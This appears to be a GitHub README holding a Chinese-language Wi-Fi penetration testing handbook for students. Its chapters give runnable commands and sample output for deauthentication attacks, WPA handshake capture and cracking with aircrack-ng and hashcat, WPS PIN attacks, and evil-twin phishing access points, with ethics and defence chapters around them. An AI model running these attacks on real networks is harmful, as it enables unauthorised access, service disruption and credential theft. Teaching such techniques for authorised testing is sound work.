koushikos/Kali-Linux-WiFi-Pentesting-Handbook

GitHub: koushikos/Kali-Linux-WiFi-Pentesting-Handbook

一本基于Kali Linux的Wi-Fi渗透测试实战指南,系统讲解无线安全攻防技术与工具使用。

Stars: 0 | Forks: 0

# Kali-Linux-WiFi-渗透测试手册 这是一本为使用 Kali Linux 进行网络安全学习而构建的无线安全渗透测试指南。内容包括详细的教程、实验流程,以及使用 Aircrack-ng、Hashcat 和 Wifite 等工具进行 Wi-Fi 安全测试技术的实战演示。 **面向道德黑客和网络安全学生的综合培训手册** **作者:Koushik Debnath** **版本:1.0** **日期:2026** ## 目录 1. [无线安全简介](#chapter-1) 2. [法律和道德考量](#chapter-2) 3. [Kali Linux 无线环境设置](#chapter-3) 4. [无线网络基础](#chapter-4) 5. [无线网卡配置](#chapter-5) 6. [发现无线网络](#chapter-6) 7. [Aircrack-ng 套件](#chapter-7) 8. [捕获 WPA/WPA2 握手包](#chapter-8) 9. [取消认证攻击](#chapter-9) 10. [破解 WPA/WPA2 密码](#chapter-10) 11. [使用 Hashcat 进行高级密码破解](#chapter-11) 12. [自动化 Wi-Fi 黑客工具](#chapter-12) 13. [WPS 攻击](#chapter-13) 14. [邪恶双子攻击](#chapter-14) 15. [数据包捕获与分析](#chapter-15) 16. [无线流量分析](#chapter-16) 17. [无线攻击故障排除](#chapter-17) 18. [完整实战演练](#chapter-18) 19. [防御无线攻击](#chapter-19) 20. [实践实验室](#chapter-20) ## 第1章 — 无线安全简介 {#chapter-1} ### Wi-Fi 安全的历史 无线网络始于 802.11(1997年),最初是不安全的。WEP(1999年)使用 RC4 和静态密钥——于 2001 年被攻破(FMS 攻击)。WPA(2003年)引入了 TKIP。WPA2(2004年)使用 AES-CCMP,但容易受到 KRACK(2017年)攻击。WPA3(2018年)增加了 SAE(Dragonfly 握手)、前向保密和防字典攻击功能。 ### 无线网络的类型 - **Infrastructure(基础架构模式)**:客户端连接到 AP(BSS/ESS)。 - **Ad-hoc (IBSS)**:点对点。 - **Mesh(网状)**:多跳。 - **Enterprise(企业)**:RADIUS 认证。 ### WPA, WPA2, WPA3 概述 | 协议 | 加密 | 密钥交换 | 漏洞 | |----------|------------|--------------|-----------------| | WPA | TKIP (RC4) | PSK/802.1X | TKIP chop-chop | | WPA2 | CCMP (AES) | PSK/802.1X | KRACK, PMKID | | WPA3 | GCMP (AES) | SAE (Dragonfly) | Downgrade | ### 常见漏洞 - 弱 PSK、WPS PIN 暴力破解、邪恶双子、取消认证 DoS、KRACK。 ### 为什么渗透测试很重要 识别真实风险;无线 = 无边界。 ## 第2章 — 法律和道德考量 {#chapter-2} ### 法律 - **美国**:CFAA (18 U.S.C. § 1030)——未经授权访问属于重罪。 - **欧盟**:GDPR、网络犯罪指令。 - **全球**:获取书面授权。 ### 道德规则 - 范围文档、保密协议 (NDA)、不要对生产环境进行 DoS 攻击。 ### 实验室设置 - 自备路由器(例如刷了 OpenWRT 的 TP-Link)、虚拟机 Kali、隔离的 VLAN。 ### 负责任的披露 - 私下报告发现,90 天的补丁窗口期。 ## 第3章 — Kali Linux 无线环境设置 {#chapter-3} ### 安装 Kali 1. 下载 ISO:kali.org 2. 虚拟机:4GB 内存,USB 直通。 ### 更新 ``` sudo apt update && sudo apt full-upgrade -y sudo apt autoremove -y ``` ### 安装工具 ``` sudo apt install aircrack-ng hashcat hcxdumptool hcxtools wifite reaver bully hostapd dnsmasq -y ``` ### 检查网卡 ``` iwconfig ``` 输出: ``` wlan0 no wireless extensions. lo no wireless extensions. ``` ``` lsusb ``` 寻找 Realtek/Atheros。 ### 芯片组兼容性 - Alfa AWUS036ACH: rtl8812au. ### 监听/注入测试 ``` sudo airmon-ng start wlan0 sudo aireplay-ng --test wlan0mon ``` ## 第4章 — 无线网络基础 {#chapter-4} ### BSSID AP MAC 地址(48位,例如 AA:BB:CC:DD:EE:FF)。 ### ESSID 人类可读的名称(SSID,最多 32 个字符)。 ### Channel(信道) 频段(2.4GHz: 1-13, 5GHz: 36-165)。 ### Beacon Frames(信标帧) 周期性广播(100ms):SSID、速率、安全信息。 ### Handshake Process(握手过程) 1. Probe/Beacon → 2. Auth → 3. Assoc → 4. 4次握手 (nonce, MIC). ### 加密类型 - None, WEP (已破解), WPA (TKIP), WPA2 (AES), WPA3 (SAE). **图示 (ASCII)**: ``` Client ----Probe----> AP Client <---Beacon---- AP Client --Auth Req--> AP Client <--Auth OK--- AP Client --Assoc Req-> AP Client <--Assoc OK-- AP Client <->4-Way HS-- AP (Keys derived) ``` ## 第5章 — 无线网卡配置 {#chapter-5} ### 模式 - **Managed(托管)**:客户端。 - **Monitor(监听)**:嗅探。 - **Master(主模式)**:AP。 ### 命令 ``` sudo airmon-ng check kill sudo airmon-ng start wlan0 # Creates wlan0mon iwconfig # Verify Mode:Monitor ``` 输出: ``` wlan0mon IEEE 802.11 Mode:Monitor Tx-Power=20 dBm ``` ``` sudo ip link set wlan0mon down sudo iwconfig wlan0mon mode monitor sudo ip link set wlan0mon up ``` 停止: ``` sudo airmon-ng stop wlan0mon ``` ## 第6章 — 发现无线网络 {#chapter-6} ### airodump-ng ``` sudo airodump-ng wlan0mon ``` **真实输出示例**: ``` CH 11 ][ Elapsed: 1:23:45 ][ 2024-XX-XX XX:XX BSSID PWR Beacons #Data, #/wep, CH MB ENC CIPHER AUTH ESSID AA:BB:CC:DD:EE:FF -1 150 200 0/0 11 54e WPA2 CCMP PSK TargetWiFi CC:DD:EE:FF:00:11 -30 120 50 0/0 6 54e WPA2 CCMP PSK NeighborNet TOP CLIENTS BSSID STATION PWR Rate Lost Frames CH AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -20 1e-1 0 123 11 ``` **列说明**: - BSSID: AP MAC - PWR: RSSI (信号) - CH: Channel (信道) - ENC: OPN/WEP/WPA2 - ESSID: 名称 ### iw dev / iwlist ``` iw dev wlan0mon scan iwlist wlan0mon scan ``` ### wash (WPS) ``` sudo wash -i wlan0mon ``` ## 第7章 — Aircrack-ng 套件 {#chapter-7} ### airmon-ng **用途**:接口管理。 **语法**:`airmon-ng [start|stop] iface` **示例**:见第5章。 ### airodump-ng **用途**:扫描器/捕获器。 **语法**:`airodump-ng [opts] iface` **场景**:目标:`--bssid AA:BB:CC:DD:EE:FF -c 11 -w cap wlan0mon` ### aireplay-ng **用途**:注入。 **语法**:`aireplay-ng [attack] [opts] iface` **攻击**:Deauth (`-0`), ARP replay (`-3`) 等。 ### aircrack-ng **用途**:破解器。 **语法**:`aircrack-ng [opts] capfile` ### airdecap-ng **用途**:解密 cap 文件。 ``` airdecap-ng -e ESSID capture.cap ``` ### airbase-ng **用途**:恶意 AP。 ``` sudo airbase-ng -c 11 -e 'FreeWiFi' wlan0mon ``` ## 第8章 — 捕获 WPA/WPA2 握手包 {#chapter-8} **认证**:预共享密钥 → PMK → PTK。 **握手**:4 个 EAPOL 消息。 **命令**: 1. `sudo airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w hs wlan0mon` 2. 确认:右上角 `[ WPA Handshake: AA:BB:CC:DD:EE:FF ]` ## 第9章 — 取消认证攻击 {#chapter-9} **是什么**:用于断开客户端连接的管理帧(无需 ack)。 **为什么**:强制重连 → 获得握手包。 **命令**: ``` sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon ``` 输出: ``` Sending DeAuth to station -- STMAC: [11:22:33:44:55:66] Sending 10 directed DeAuth. STMAC: [11:22:33:44:55:66]... ``` **数据包流向**:Deauth → 客户端重连 → 握手包被捕获。 ## 第10章 — 破解 WPA/WPA2 密码 {#chapter-10} **字典攻击**:尝试 PSK → PMK → 验证 MIC。 ``` aircrack-ng hs-01.cap -w /usr/share/wordlists/rockyou.txt ``` 输出: ``` KEY FOUND! [ password123 ] ``` **暴力破解**:`crunch 8 8 -t @@@@@@@@1 -o brute.txt` ## 第11章 — 使用 Hashcat 进行高级密码破解 {#chapter-11} **GPU**:更快(数百万 PMKs/秒)。 **转换**: ``` hcxdumptool -i wlan0mon -o hs.pcapng hcxpcapngtool -o hs.22000 hs.pcapng ``` **破解**: ``` hashcat -m 22000 hs.22000 rockyou.txt --force ``` `-m 22000`: WPA-PMKID-PBKDF2-PMKID+EAPOL 性能:RTX 4090 ~1M H/s. ## 第12章 — 自动化 Wi-Fi 黑客工具 {#chapter-12} ### wifite ``` sudo wifite --wpa --wps --dict rockyou.txt ``` 自动:扫描 → 取消认证 → 捕获 → 破解。 ### fluxion Git clone: https://github.com/FluxionNetwork/fluxion ``` ./fluxion.sh ``` 钓鱼邪恶双子。 ### fern wifi cracker ``` fern-wifi-cracker ``` GUI 扫描/攻击。 ## 第13章 — WPS 攻击 {#chapter-13} **漏洞**:8位 PIN (1st4 * 10000 + last4),校验和。 ### wash ``` wash -i wlan0mon --all ``` 输出:WPS 锁定?,PIN 尝试次数。 ### reaver ``` reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 11 -vv -K 1 ``` ### bully 更快,并发。 ## 第14章 — 邪恶双子攻击 {#chapter-14} **虚假 AP** 伪装成合法 AP,钓鱼获取凭据。 ### airbase-ng ``` airbase-ng -c 11 -e 'TargetWiFi' -P 4 wlan0mon ``` ### fluxion 自动化钓鱼页面。 ### hostapd 配置 `hostapd.conf`: ``` interface=wlan0 ssid=TargetWiFi hw_mode=g channel=11 ``` `sudo hostapd hostapd.conf` ## 第15章 — 数据包捕获与分析 {#chapter-15} ### tcpdump ``` sudo tcpdump -i wlan0mon -w capture.pcap -s 0 ``` ### Wireshark `wireshark capture.pcap` 过滤器:`wlan.fc.type_subtype == 0x08` (beacons). ## 第16章 — 无线流量分析 {#chapter-16} **帧类型**: - **Mgmt (0)**: Beacon (8), Probe, Auth, Deauth (12). - **Control (1)**: RTS/CTS, ACK. - **Data (2)**: QoS Data. Wireshark: `wlan.fc.type == 0` (mgmt). ## 第17章 — 无线攻击故障排除 {#chapter-17} | 问题 | 修复 | |---------|-----| | No monitor | `sudo apt install firmware-realtek`; `modprobe rtl88xxau` | | Injection fail | `aireplay-ng --test` | | NM interfere | `airmon-ng check kill` | | RTL8812AU | DKMS driver: `git clone rtl88xxau` | ## 第18章 — 完整实战演练 {#chapter-18} **目标**:LabWiFi (BSSID: AA:BB:CC:DD:EE:FF, CH11, PSK:password123) 1. `sudo airmon-ng check kill; sudo airmon-ng start wlan0` 2. `sudo airodump-ng wlan0mon` → 记录详细信息 3. 终端1:`sudo airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w lab wlan0mon` 4. 终端2:`sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon` 5. `aircrack-ng lab-01.cap -w rockyou.txt` 6. 清理:`sudo airmon-ng stop wlan0mon; sudo service NetworkManager restart` ## 第19章 — 防御无线攻击 {#chapter-19} - **WPA3 Personal/Enterprise** - PSK:20+ 字符,密码短语 - 禁用 WPS(固件更新) - MAC 过滤 + RADIUS - 无线 IDS (Snort rules) - 802.11w (Mgmt frame protection) vs deauth - 监控:`airodump-ng` 告警 ## 第20章 — 实践实验室 {#chapter-20} ### 实验 1:基础扫描 扫描 10 个网络,记录 BSSIDs/ENC。 ### 实验 2:握手包捕获 从自己的 AP 捕获,在 Wireshark 中验证。 ### 实验 3:WPS Pixie Dust 在易受攻击的路由器上使用 reaver。 ### 实验 4:邪恶双子 设置 airbase-ng,连接受害者虚拟机。 ### 实验 5:完整攻击链 在实验室 AP 上使用 Wifite → 破解 → 报告。 **恭喜!** 您现在已经熟练掌握 Wi-Fi 渗透测试请合乎道德地练习。 **附录:字典** - `/usr/share/wordlists/dirb/` - SecLists GitHub **参考**: - aircrack-ng.org - kali.org/docs
标签:Aircrack-ng, Bitdefender, Deauth 攻击, Evil Twin, Hashcat, IEEE 802.11, Kali Linux 工具, PE 加载器, VEH, Wifite, Wi-Fi 安全, WPA2 破解, WPA 握手包, WPS 攻击, 中间人攻击, 字典攻击, 无线渗透, 无线网络审计, 渗透测试指南, 漏洞修复, 网络嗅探, 网络安全培训, 网络安全实验, 网络安全教程